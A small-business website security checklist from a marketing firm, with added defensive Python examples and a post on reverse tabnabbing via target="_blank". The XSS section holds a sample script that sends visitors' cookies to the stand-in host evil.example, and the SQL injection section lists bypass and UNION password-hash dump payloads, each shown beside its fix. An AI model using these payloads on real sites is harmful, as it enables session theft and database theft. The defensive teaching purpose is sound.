12-step website security checklist for beginners

Website security matters now more than ever.

In fact, the FBI reported that cybercrime complaints rose by roughly 300 percent after the COVID-19 pandemic began.

It’s not just about building trust with your customers, either. A breach means stolen data, cleanup costs and lost revenue while the site is down; the average global cost of a data breach was about $3.86 million in 2020. And while breaches at large, national companies are the ones that make the news, about 43 percent of cyberattacks target small businesses.

In other words, no small business is too small to be noticed by a hacker.

The following is a 12-step website security checklist that’s simple enough for even complete beginners to work through.

No. 1: Keep all your software up to date

Software updates might be annoying or inconvenient, but they’re critical: many successful attacks on small websites exploit a known vulnerability for which a patch already existed. That includes your content management system (WordPress core, for example), every plugin and theme you have installed, and the server software your host runs.

Keep an eye out for patch notifications. They’re usually released to close a vulnerability that has already been found, and once a patch is public, attackers start scanning for sites that haven’t applied it.

So in general, update as soon as you get the notification, or turn on automatic updates where your platform offers them. Resist the urge to click “remind me later.” And remove plugins and themes you no longer use: an inactive plugin can still be exploited if its files are sitting on the server.

No. 2: Tighten up your passwords

Passwords are an obvious aspect of your website security that you must consider. However, they’re often neglected in two respects:

  • Whether they are long and unique to each account
  • Whether they get changed once they have been exposed

In fact, it’s not uncommon for people to keep all their passwords written on a Post-it note stuck to their computer monitor. We definitely do not recommend this!

Focus on long, unique passwords. In 2019, the UK’s National Cyber Security Centre found the password “123456” in 23 million breached accounts. You can do better than that. Length matters more than clever substitutions: a passphrase of three or four unrelated words is both stronger and easier to remember than “P@ssw0rd1”, and every account should have its own password so that one leaked site doesn’t unlock the rest.

To help with your password management, you can try tools like LastPass and 1Password. A password manager generates a strong, unique password for every account, stores them all behind one master password and tells you when a stored password has turned up in a known breach. Change a password immediately when that happens or when you suspect it has been exposed. The old advice to rotate every six to 12 months matters far less than length and uniqueness: current NIST guidance (SP 800-63B) drops scheduled rotation and instead says to change a password when there is evidence it has been compromised. Wherever your hosting control panel or CMS offers two-factor authentication, turn it on; it blunts a stolen password.

No. 3: Prevent spam comments on your website

Especially if you maintain a blog on your website, spam comments will be a constant concern. They are one of the most common ways spammers abuse small websites: the comments carry links to their own (often malicious or phishing) pages, and comment fields are a favourite place to try to smuggle in scripts.

Obviously, spam comments erode the trust your real visitors have in your site. In addition, a page full of junk links doesn’t bode well for your search engine optimization (SEO) either.

There are a number of integrations and plugins (anti-spam filters, CAPTCHAs and moderation queues that hold comments until you approve them) that can help you identify and moderate comments with a simple code embed. Check whether your hosting platform or CMS already offers one before adding a third-party service.

No. 4: Prepare for the worst by regularly backing up your website (and all of its data)

By backing up your website regularly, you’ll be able to bounce back quickly should something go wrong.

The “wrong” could be a hacker, but it also could just be a garbled website after a problematic redesign. 

Check with your hosting provider first; many offer scheduled backups. If you’re using WordPress, several plugins can automate backups. Whatever you use, make sure the backup covers both the files (core, themes, plugins, uploads) and the database, keep at least one copy somewhere other than the web server itself (an attacker or a disk failure that takes out the server takes its local backups with it), and actually try restoring from a backup now and then. An untested backup is a hope, not a plan.
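To make the files-plus-database point concrete, here is an added example of a small backup script in Python. It is not code from the original article or from any hosting provider; the paths (/var/www/html, /var/backups/site), the database name and the retention count are assumptions to replace with your own, and the database dump assumes mysqldump is installed and reads its credentials from ~/.my.cnf. The rehearse() function runs the whole cycle against a throwaway directory so you can see what a restore would have to work with.

```python
import subprocess
import tarfile
import tempfile
import time
from pathlib import Path

# Assumed paths and names for illustration; adjust them for your own host.
SITE_DIR = Path("/var/www/html")
BACKUP_DIR = Path("/var/backups/site")
DB_NAME = "wordpress"
KEEP_LAST = 7


def make_stamp() -> str:
    """Timestamp that sorts correctly as a string, so 'newest' is simply 'last'."""
    return time.strftime("%Y%m%d-%H%M%S", time.gmtime())


def backup_files(site_dir: Path, backup_dir: Path, stamp: str) -> Path:
    """Archive the whole web root (CMS core, themes, plugins, uploads) into a
    compressed tarball and return its path."""
    backup_dir.mkdir(parents=True, exist_ok=True)
    archive = backup_dir / f"site-{stamp}.tar.gz"
    with tarfile.open(str(archive), "w:gz") as tar:
        tar.add(str(site_dir), arcname=site_dir.name)
    return archive


def backup_database(db_name: str, backup_dir: Path, stamp: str) -> Path:
    """Dump a MySQL/MariaDB database. Credentials come from ~/.my.cnf so they
    never appear on the command line, where `ps` would show them to other users."""
    dump = backup_dir / f"db-{stamp}.sql"
    with open(dump, "wb") as out:
        subprocess.run(["mysqldump", "--single-transaction", db_name],
                       stdout=out, check=True)
    return dump


def list_backup(archive: Path) -> list:
    """Restore rehearsal, step one: prove the archive opens and see what is in it."""
    with tarfile.open(str(archive), "r:gz") as tar:
        return tar.getnames()


def prune_old_backups(backup_dir: Path, keep: int) -> list:
    """Keep the newest `keep` archives of each kind, delete the rest and return
    the paths removed. Only safe because an off-site copy exists as well."""
    removed = []
    for pattern in ("site-*.tar.gz", "db-*.sql"):
        files = sorted(backup_dir.glob(pattern))
        for old in (files[:-keep] if keep > 0 else files):
            old.unlink()
            removed.append(old)
    return removed


def rehearse(keep: int = 2) -> dict:
    """Self-contained dry run on a constructed throwaway site: back up four
    times, list the newest archive, prune, and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "html"
        (site / "wp-content" / "uploads").mkdir(parents=True)
        (site / "index.php").write_text("<?php // constructed sample file\n")
        (site / "wp-content" / "uploads" / "logo.png").write_bytes(b"\x89PNG")
        dest = Path(tmp) / "backups"
        stamps = [f"20240101-00000{i}" for i in range(4)]
        archives = [backup_files(site, dest, s) for s in stamps]
        members = list_backup(archives[-1])
        removed = prune_old_backups(dest, keep)
        return {
            "members": members,
            "removed": len(removed),
            "remaining": sorted(p.name for p in dest.iterdir()),
        }


if __name__ == "__main__":
    stamp = make_stamp()
    backup_files(SITE_DIR, BACKUP_DIR, stamp)
    backup_database(DB_NAME, BACKUP_DIR, stamp)
    prune_old_backups(BACKUP_DIR, KEEP_LAST)
```

Run it from cron once a day, then copy the newest archive and dump off the server (rclone, scp or your host’s object storage) so the backup survives whatever happens to the machine. The pruning step intentionally keeps only a handful of local copies; the off-site copy is the one you are really relying on.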

No. 5: Use an SSL certificate

SSL stands for Secure Sockets Layer. Its modern successor is TLS (Transport Layer Security), which is what browsers actually use today, but the certificates are still called SSL certificates out of habit. Either way, the point is the same: the connection between the visitor’s browser and your server is encrypted, so data in transit can’t be read or altered along the way.

Think login credentials, credit card numbers or any other personal information. Without encryption, anyone on the network path (a coffee-shop Wi-Fi, an ISP, a compromised router) can read it.

In addition, SSL boosts the overall perceived security of your website: browsers show a lock symbol (or a similar indicator) next to the address of a site served over HTTPS. If you don’t have a certificate, browsers label the page “Not secure,” and if the certificate is invalid or expired they show a full-page warning that most visitors will not click through.

If you don’t already have an SSL certificate for your website, the traditional way to get one is:

  • Checking that your domain registration is current and that the contact details are ones you control (the ICANN Lookup tool shows the public WHOIS/RDAP record); some certificate authorities use those addresses to confirm you own the domain.
  • Generating a Certificate Signing Request (CSR) on your own server or through your cPanel. Avoid online CSR generators: the CSR is created together with a private key, and a private key that another website generated for you is no longer private.
  • Submitting the CSR to a certificate authority, which validates that you control the domain and issues the certificate.
  • Installing the certificate (and any intermediate certificates the authority supplies) on your web server, and redirecting HTTP traffic to HTTPS.

Many hosts now skip all of that and issue a free, automatically renewing certificate (commonly from Let’s Encrypt) with one click. Whichever route you take, note the expiry date. Certificates expire, and an expired certificate turns your site into a browser warning page overnight.
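Once the certificate is installed, the check a practitioner wants is “does it validate, does it cover my hostname, and how long until it expires?” Here is an added example in Python that answers those questions; it is not code from the original article. The live check uses only the standard library and validates the chain exactly as a browser would. The SAMPLE_CERT dictionary is a constructed stand-in (in the format Python’s ssl module returns) with made-up names and dates, so the expiry and hostname logic can be exercised offline.

```python
import socket
import ssl
from datetime import datetime, timezone

# Constructed sample in the shape ssl.SSLSocket.getpeercert() returns. The
# names and dates are assumptions for illustration, not a real certificate.
SAMPLE_CERT = {
    "subject": ((("commonName", "www.example.com"),),),
    "issuer": ((("organizationName", "Example CA"),),),
    "subjectAltName": (("DNS", "www.example.com"), ("DNS", "example.com")),
    "notBefore": "Jan  1 00:00:00 2024 GMT",
    "notAfter": "Mar 31 23:59:59 2024 GMT",
}
SAMPLE_NOW = datetime(2024, 3, 1, tzinfo=timezone.utc)


def fetch_certificate(host: str, port: int = 443, timeout: float = 10.0) -> dict:
    """Connect the way a browser would: the default context verifies the chain
    against the system trust store and checks the hostname. An untrusted or
    expired certificate raises ssl.SSLCertVerificationError instead of returning."""
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


def days_until_expiry(cert: dict, now: datetime) -> int:
    """Whole days between `now` and the certificate's notAfter."""
    expires_at = datetime.fromtimestamp(
        ssl.cert_time_to_seconds(cert["notAfter"]), tz=timezone.utc)
    return (expires_at - now).days


def covers_hostname(cert: dict, host: str) -> bool:
    """Does a subjectAltName DNS entry match the host? Exact match, or a
    single-label wildcard (*.example.com covers www.example.com but not
    example.com or a.b.example.com). Browsers ignore the commonName."""
    host = host.lower().rstrip(".")
    for kind, name in cert.get("subjectAltName", ()):
        if kind != "DNS":
            continue
        name = name.lower()
        if name == host:
            return True
        if name.startswith("*.") and "." in host and host.split(".", 1)[1] == name[2:]:
            return True
    return False


def assess_certificate(cert: dict, host: str, now: datetime, warn_days: int = 14) -> dict:
    """Summarise the facts a renewal reminder needs."""
    days_left = days_until_expiry(cert, now)
    return {
        "host": host,
        "days_left": days_left,
        "expiring_soon": days_left <= warn_days,
        "hostname_ok": covers_hostname(cert, host),
    }


def check_site(host: str, warn_days: int = 14) -> dict:
    """Live check suitable for a daily cron job; raises if the chain is bad."""
    cert = fetch_certificate(host)
    return assess_certificate(cert, host, datetime.now(timezone.utc), warn_days)
```

Point check_site() at your own domain from a scheduled job and alert on expiring_soon (or on the exception the handshake raises). Because the handshake itself validates the chain, an already-expired or misissued certificate fails loudly rather than being silently reported with a negative day count.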

No. 6: Limit both user permissions and access

Spoiler alert: You should not give all your employees and colleagues unfettered access to the backend of your website.

Every account that can log in is another way into your site, so set permissions that match each team member’s role (a writer who publishes posts doesn’t need to install plugins or change site settings), and give each person their own account rather than sharing one login.

Of course, you’ll want to remove access as soon as an employee leaves your team, and it’s worth reviewing the list of accounts every few months for ones nobody recognises. The password rules above apply to every user, not just you.

No. 7: Only use a trusted payment provider

If you’re processing payments of any kind on your website, it’s important to only use a trusted payment provider. 

Two of the biggest providers are PayPal and Stripe.

Not only will a trusted provider process payments properly and securely, but using one also means card numbers are entered on the provider’s systems rather than stored on yours, which spares you most of the burden of protecting them. And a familiar checkout builds trust with your website visitors.

No. 8: Reduce any XSS vulnerabilities on your website

XSS stands for Cross-Site Scripting. It refers to an attacker getting their own script into a page your site serves, usually by submitting it through something that accepts user input (a comment form, a search box, a URL parameter) that the site then displays without escaping. The script runs in your visitors’ browsers as if it were part of your site, so it can steal their session cookies, capture what they type or redirect them to a phishing page.

Fixing these vulnerabilities properly usually requires a web developer: the real cure is to escape every piece of user-supplied data at the point where it is written into a page, and to validate input on the way in. Beginners should still know the threat exists. In the meantime, a web application firewall (see No. 12) can block many common XSS payloads, and if your site must accept HTML from users (formatted comments, for example), run it through a sanitizer such as HTML Purifier rather than writing your own filter.
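To show what “escape on output” means in practice, here is an added example in Python (not code from the original article). It renders a blog comment the vulnerable way and the fixed way, and then shows the case escaping alone does not cover: a user-supplied link, where a “javascript:” address contains no special characters at all. The attacker comment and the evil.example host are constructed for the demonstration.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input: a "comment" that tries to ship each visitor's
# cookies to an attacker-controlled host (evil.example is a placeholder).
ATTACK_COMMENT = '<script>new Image().src="https://evil.example/c?"+document.cookie</script>'


def render_comment_unsafe(author: str, body: str) -> str:
    """VULNERABLE: user text is pasted straight into the page, so the
    <script> in ATTACK_COMMENT runs in every visitor's browser."""
    return f'<p class="comment"><b>{author}</b>: {body}</p>'


def render_comment_safe(author: str, body: str) -> str:
    """FIXED: escape at the point of output. html.escape turns <, >, &, " and '
    into entities, so the browser displays the payload as text."""
    return f'<p class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</p>'


ALLOWED_SCHEMES = {"http", "https"}


def render_profile_link(url: str, label: str) -> str:
    """Inside an href, escaping is not enough: "javascript:alert(1)" has no
    special characters yet still executes. Allowlist the scheme; if the URL is
    anything else, drop the link and keep only the (escaped) label."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return html.escape(label)
    return f'<a href="{html.escape(url)}" rel="nofollow">{html.escape(label)}</a>'
```

The same rule applies to every template in your site, not just comments: decide the context (HTML body, attribute, URL, JavaScript) and use the escaping that context needs. Most template engines can do this automatically once you turn auto-escaping on; the danger zones are the places where a developer has switched it off to paste “trusted” HTML.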

No. 9: Reduce any SQL injection vulnerabilities

If your website handles a lot of sensitive user data, you’re going to want to consider SQL injection vulnerabilities on top of XSS. (If the sensitive data in question is card numbers, the right answer is usually not to store them at all; let the payment provider from No. 7 hold them.)

Where XSS runs in the visitor’s browser, SQL injection goes straight for your database: the attacker crafts input that changes the meaning of a database query, and a single successful injection can read, alter or delete every record in it.

Again, this is definitely a step to discuss with your web developer. The fix that actually closes the hole is to use parameterized queries (prepared statements) so that user input is never pasted into the text of a query. Supporting measures include giving the website’s database account only the permissions it needs, using a whitelist for the few places where a parameter can’t be used (sort columns, table names) and, as a stopgap, a firewall that filters the obvious payloads.
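Here is an added example in Python using the standard library’s SQLite driver (not code from the original article) that shows the vulnerable query, what an attacker’s input turns it into, the parameterized fix, and the whitelist for the one place parameters can’t help. The users table and its placeholder “hashes” are constructed for the demonstration.

```python
import sqlite3

# Constructed demo data; the password_hash values are placeholders, not real hashes.
USERS = [
    ("alice", "$2b$12$alicehash", "alice@example.com"),
    ("bob", "$2b$12$bobhash", "bob@example.com"),
    ("carol", "$2b$12$carolhash", "carol@example.com"),
]


def make_db() -> sqlite3.Connection:
    """In-memory database so the example runs anywhere."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE,"
        " password_hash TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password_hash, email) VALUES (?, ?, ?)", USERS)
    return conn


def unsafe_sql(username: str) -> str:
    """The query text a vulnerable site builds by string formatting."""
    return f"SELECT username, email FROM users WHERE username = '{username}'"


def find_user_unsafe(conn: sqlite3.Connection, username: str) -> list:
    """VULNERABLE: the input can change the structure of the query."""
    return conn.execute(unsafe_sql(username)).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """FIXED: the value travels separately from the SQL text, so a quote in the
    input is just a character inside a string, never part of the query."""
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)).fetchall()


SORTABLE_COLUMNS = {"username", "email"}


def list_users_sorted(conn: sqlite3.Connection, column: str) -> list:
    """Identifiers (column or table names) cannot be bound as parameters, so the
    one unavoidable piece of string building gets an allowlist instead."""
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    return conn.execute(f"SELECT username, email FROM users ORDER BY {column}").fetchall()


# Two classic payloads, constructed for the demo:
BYPASS_PAYLOAD = "' OR '1'='1"                                   # returns every row
DUMP_PAYLOAD = "x' UNION SELECT username, password_hash FROM users -- "  # reads another column
```

With the unsafe version, BYPASS_PAYLOAD turns the lookup into WHERE username = '' OR '1'='1', which matches everyone, and DUMP_PAYLOAD appends a UNION that returns the password hashes in place of the e-mail column. Against the parameterized version both payloads are just usernames nobody has. The database account a website uses should also be unable to DROP tables or read other applications’ schemas, so that even a missed injection has limited reach.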

No. 10: Use anti-malware software for advanced, extra website security

Anti-malware software aims to prevent security threats by detecting and removing them early on from your website (before they do too much damage).

Of course, anti-malware can cost money to install and use. Take the time to review your budget, and remember that the cost of a breach (both monetary and reputational) can be far higher.

Many website hosting platforms have anti-malware software that you can subscribe to, but if not, you can check out such tools as SiteGuarding or Quttera and see if either is right for you.

No. 11: Keep an eye out for any traffic surges

Another type of website security attack involves flooding your website with fake traffic to overwhelm your web servers and knock the site offline.

This type of attack, called a Distributed Denial of Service (DDoS), happened more than 10 million times in 2020 alone.

Fortunately, your traffic analytics and your server’s access logs can help you spot strange surges, particularly a flood of requests from a handful of addresses or aimed at a single URL such as your login page. Many web hosting platforms include basic DDoS protection, but you can also put an external service such as Cloudflare or Radware in front of your site for additional protection.
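As an added example (not from the original article), here is a small Python script that does the log-based version of that check: it reads access log lines in the combined format that Apache and nginx write by default, counts requests per client address per minute, and flags addresses and minutes that exceed a limit. The log lines are constructed for the demonstration (the 198.51.100.0/24, 192.0.2.0/24 and 203.0.113.0/24 ranges are reserved for documentation); the thresholds are assumptions you should tune against a week of your own normal traffic.

```python
import re
from collections import Counter
from datetime import datetime

# Combined log format, the default for Apache and nginx access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line: str):
    """Return the fields we need, with the timestamp truncated to the minute,
    or None for a line that is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "minute": when.replace(second=0),
        "request": m.group("request"),
        "status": int(m.group("status")),
    }


def find_surges(lines, per_ip_limit: int, total_limit: int) -> dict:
    """Flag addresses that exceed per_ip_limit requests within any one minute,
    and minutes whose total request count exceeds total_limit."""
    per_ip, per_minute = Counter(), Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than abort the whole run
        per_ip[(rec["minute"], rec["ip"])] += 1
        per_minute[rec["minute"]] += 1
    abusive_ips = sorted({ip for (_, ip), n in per_ip.items() if n > per_ip_limit})
    hot_minutes = sorted(m for m, n in per_minute.items() if n > total_limit)
    return {"abusive_ips": abusive_ips, "hot_minutes": hot_minutes}


def _constructed_log() -> list:
    """Constructed sample, not real traffic: three ordinary requests, one junk
    line, and a burst of 30 login-page hits from one address inside one minute."""
    normal = [
        '198.51.100.4 - - [10/Oct/2020:13:54:02 +0000] "GET / HTTP/1.1" 200 5120',
        '198.51.100.4 - - [10/Oct/2020:13:54:09 +0000] "GET /blog/ HTTP/1.1" 200 8210',
        '192.0.2.77 - - [10/Oct/2020:13:55:41 +0000] "POST /contact HTTP/1.1" 302 0',
        'this line is not in combined log format',
    ]
    burst = [
        f'203.0.113.9 - - [10/Oct/2020:13:55:{sec:02d} +0000] "GET /wp-login.php HTTP/1.1" 200 1234'
        for sec in range(0, 60, 2)
    ]
    return normal + burst


SAMPLE_LOG = _constructed_log()
```

In real use you would feed it the last few minutes of your access log from a scheduled job and hand abusive_ips to your firewall or WAF’s block list. A genuine distributed attack spreads requests across many addresses, so the per-minute total is the signal that matters there, and mitigation has to happen upstream (at the host or a service such as Cloudflare) rather than on the server being flooded.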

No. 12: Get an extra layer of protection with Web App Firewalls

Web application firewalls, usually abbreviated WAF, defend against several of the attacks covered above, which is why this isn’t our first mention of them.

A WAF sits between the internet and your web server, inspects each request and blocks those that match its policies for malicious traffic: known XSS and SQL injection payloads, bots hammering your login page, and so on. It reduces your exposure while you fix the underlying code; it doesn’t replace fixing it.

If you’re a small business, we recommend a cloud-based or software-based WAF for lower cost and easier maintenance. Hardware WAFs exist too; they’re more expensive and harder to maintain, and mainly make sense for organisations that run their own infrastructure and need the extra capacity and control.

In conclusion

Website security can feel like an overwhelming topic for any website beginner, but simply go step-by-step to identify what you can do better to protect your business and your customers.

Looking to level up your digital marketing process as you secure your website? Consider DailyStory, which features automation, audience segmentation and more. Schedule your free demo with us today.

Building outbound links? You may have a link phishing security issue

If you are building outbound links and using target="_blank" to open clicks in a new browser tab, you may have a link phishing security issue.


As a digital marketing business, we want to help people find great content. That means we create lots of content and link to content. For example, we maintain a list of upcoming marketing conferences and marketing statistics.

Like many websites, for our outbound links, we use target="_blank" in our link anchors. This opens the link in a new tab in the web browser. We do this for a couple of reasons, but the main one is that it keeps the visitor on our website and hopefully they’ll come back when they finish following the link they clicked.

However, this technique creates a phishing vulnerability known as reverse tabnabbing.

This link phishing vulnerability is not only dangerous, but it is something that a lot of content marketers don’t realize is happening.

How Do I Fix This?

I’ll explain how this link phishing vulnerability works, but if you just want the fix, add this to any links where you use target="_blank":

rel="noopener noreferrer"

For example, let’s say you want to link to DailyStory’s list of upcoming marketing conferences (we would appreciate that). Of course, you want that link to open in a new browser tab. Here is what your link should look like in HTML:

<a href="https://www.dailystory.com/blog/best-marketing-conferences-2017/" target="_blank" rel="noopener noreferrer">List of Marketing Conferences in 2017</a>

When you add rel="noopener noreferrer" to your link, noopener stops the newly opened page from reaching back to the tab that opened it, and noreferrer additionally keeps your page’s address out of the Referer header the other site receives. Modern browsers (Chrome 88, Firefox 79 and Safari 12.1 onward) apply noopener to target="_blank" links automatically, but adding it explicitly costs nothing and covers older browsers. Something every content marketer should care about!
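If you have a back catalogue of posts, adding the attribute by hand is tedious. Here is an added example in Python (not code from the original post) that post-processes HTML you already have, such as a CMS export or a newsletter template, and adds rel="noopener noreferrer" to every target="_blank" anchor that lacks it, while leaving every other link byte-for-byte untouched. It works on anchor start tags with a regular expression, which is fine for the HTML a blog editor produces but is not a general-purpose HTML parser.

```python
import re

# Matches an <a ...> start tag, handling quoted values that contain '>'.
ANCHOR_RE = re.compile(
    r'<a\b(?P<attrs>(?:\s+[^\s=>/]+(?:\s*=\s*(?:"[^"]*"|\'[^\']*\'|[^\s>]+))?)*)\s*>',
    re.IGNORECASE,
)
# Splits the attribute text into (name, raw value) pairs; value is "" when absent.
ATTR_RE = re.compile(r'([^\s=>/]+)(?:\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+))?')
REQUIRED_REL = ("noopener", "noreferrer")


def _unquote(value: str) -> str:
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        return value[1:-1]
    return value


def _harden_anchor(match) -> str:
    attrs = [(name, _unquote(value)) for name, value in ATTR_RE.findall(match.group("attrs"))]
    target = next((v for n, v in attrs if n.lower() == "target"), None)
    if target is None or target.lower() != "_blank":
        return match.group(0)  # not a new-tab link: leave it exactly as it was
    rel_tokens = next((v.split() for n, v in attrs if n.lower() == "rel"), [])
    present = {t.lower() for t in rel_tokens}
    missing = [t for t in REQUIRED_REL if t not in present]
    if not missing:
        return match.group(0)  # already hardened: preserve the original text
    new_rel = " ".join(rel_tokens + missing)
    parts, rel_written = [], False
    for name, value in attrs:
        if name.lower() == "rel":
            if rel_written:
                continue  # drop a duplicate rel attribute
            value, rel_written = new_rel, True
        safe_value = value.replace('"', "&quot;")
        parts.append(f' {name}="{safe_value}"')
    if not rel_written:
        parts.append(f' rel="{new_rel}"')
    return match.group(0)[:2] + "".join(parts) + ">"  # keep the original '<a' or '<A'


def harden_links(html: str) -> str:
    """Return `html` with every target="_blank" anchor carrying noopener and noreferrer."""
    return ANCHOR_RE.sub(_harden_anchor, html)
```

Existing rel values such as nofollow are kept and the two tokens are appended, so the script is safe to run repeatedly: a second pass changes nothing. Run it over exported posts before re-importing them, or wire harden_links() into whatever step renders your templates.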

It’s worth mentioning that if you are using a recent version of WordPress, it does this for you automatically when you create a link in the rich editor and select ‘Open link in a new tab’.

How does this link phishing vulnerability work?

There are lots of good technical explanations of this problem. We’ll summarize and then walk through how an attack could work.

It’s worth noting that the articles we referenced all describe this vulnerability as it once affected both Facebook and Instagram. Those have since been fixed.

The simplest explanation is that the newly opened tab, the one created by your target="_blank" link, receives a reference to the tab that opened it: in JavaScript, window.opener.

The same-origin policy stops the new page from reading anything out of your tab, but it does not stop the new page from navigating your tab somewhere else. By setting window.opener.location, JavaScript on the opened page can redirect the page the visitor left behind to any address it likes.

Here is how the vulnerability works:

Someone visits your website and clicks on one of your links to read a blog you referenced, let’s call it “Some Great New Business Idea”. Because your link used target="_blank" a new browser tab was opened. This new tab can access the tab that opened it.

“Some Great New Business Idea” is a page designed to exploit this vulnerability in the hopes that people will link to it ( a bit of a stretch, but work with me).

JavaScript on “Some Great New Business Idea” can communicate with the browser tab that opened it and redirect it to a fake phishing page that looks like a Twitter login screen.

You finish reading “Some Great New Business Idea”, close the tab and see that Twitter wants you to sign back in. Unfortunately, you are now the victim of a phishing attack and have unknowingly handed someone your Twitter login.

Bottom line

If you are using outbound links in your content marketing strategy, and most of us are, you need to make sure you fix this so you don’t expose your readers and visitors to this link phishing vulnerability.